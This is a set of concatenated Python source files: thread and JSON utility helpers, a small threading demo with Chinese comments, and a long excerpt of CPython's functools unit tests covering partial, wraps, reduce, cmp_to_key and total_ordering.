def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
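# Illustrative sketch (not in the original module): after
# setup_thread_excepthook() is called once from the main thread, exceptions
# escaping any Thread.run() are routed through sys.excepthook instead of
# threading's own (pre-3.8) fallback handler.
def _example_thread_excepthook():
    setup_thread_excepthook()
    def boom():
        raise RuntimeError("reported via sys.excepthook")
    t = threading.Thread(target=boom)
    t.start()
    t.join()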
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
mutiThreadReqHttp.py
|
import threading, time
def run(num):
print("子线程%s开始..." % (threading.current_thread().name))
time.sleep(2)
print(num)
time.sleep(2)
# current_thread 返回一个当前线程的实例
print("子线程%s结束..." % (threading.current_thread().name))
if __name__ == '__main__':
print("主线程%s启动..." % (threading.current_thread().name))
# 创建子线程
t = threading.Thread(target=run, args=(1,))
t.start()
t.join()
print("主线程%s结束..." % (threading.current_thread().name))
|
test_functools.py
|
import abc
import builtins
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import time
import unittest
import unittest.mock
from weakref import proxy
import contextlib
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
